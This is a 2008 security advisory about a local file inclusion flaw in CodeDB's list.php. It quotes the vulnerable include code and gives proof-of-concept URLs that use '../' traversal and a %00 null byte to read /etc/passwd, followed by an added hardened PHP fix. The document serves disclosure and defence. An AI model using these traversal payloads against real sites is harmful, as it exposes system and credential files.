codedb-lfi.txt

2008-07-15T00:00:00
ID PACKETSTORM:68188
Type packetstorm
Reporter cOndemned
Modified 2008-07-15T00:00:00

Description

                                        
                                            `###############################################################################  
#  
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability  
# Author : cOndemned  
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*  
#  
###############################################################################  
  
Source :  
  
// list.php (excerpt)  
  
$lang = htmlspecialchars($_GET['lang']); // escapes HTML only, so it does nothing against ../ or %00  
  
// ...  
  
if(file_exists('templates/'.$lang.'_middle.php')) // the appended '_middle.php' has to be cut off (hence the %00 in the PoC)  
    include('templates/'.$lang.'_middle.php'); // the user-controlled path is included as PHP  
  
  
Proof of Concept :  
  
http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00  
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00  
http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00  
  
  
EoF.   
  
`
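
A hardened form of the list.php lookup quoted above, as an added example (not code from CodeDB or from the advisory's author): the `lang` value is matched against a strict pattern and the resolved file must sit directly inside `templates/`. The function name `resolve_lang_template`, the accepted pattern and the demo directory layout are assumptions.

```php
<?php
// Added example, not CodeDB's code. Assumption: templates are named
// templates/<lang>_middle.php, as in the list.php excerpt above.

/**
 * Return the absolute path of the template for $lang, or null if the value
 * is not a plain language code or the file lies outside $templateDir.
 */
function resolve_lang_template($lang, $templateDir)
{
    // 1. Allowlist by shape: a short alphabetic code such as "en" or "pt_BR".
    //    This rejects "../", "/", "\0" and "%00" before any filesystem call.
    if (!is_string($lang) || !preg_match('/\A[a-z]{2,8}(?:_[A-Za-z]{2})?\z/', $lang)) {
        return null;
    }

    // 2. Canonicalise both paths; realpath() returns false for missing files.
    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . $lang . '_middle.php');
    if ($base === false || $path === false) {
        return null;
    }

    // 3. Containment check: the resolved file must sit directly under $base
    //    (this also catches a symlink that points somewhere else).
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary templates/ directory holding one template.
$dir = sys_get_temp_dir() . '/codedb_demo_' . getmypid() . '/templates';
mkdir($dir, 0700, true);
file_put_contents($dir . '/en_middle.php', '<?php echo "english template\n";');
file_put_contents(dirname($dir) . '/readme.txt', 'not a template');

// Constructed inputs modelled on the PoC URLs ("%00" arrives decoded as "\0").
foreach (array('en', "../readme.txt\0", "../../../../etc/passwd\0", 'de') as $input) {
    $tpl = resolve_lang_template($input, $dir);
    printf("%-32s => %s\n", json_encode($input), $tpl === null ? 'rejected' : 'include ' . basename($tpl));
    if ($tpl !== null) {
        include $tpl;
    }
}
```

From PHP 5.3.4 onward the filesystem functions reject paths containing a null byte, which removes the suffix-truncation step but not the directory traversal itself, so the input check is still needed.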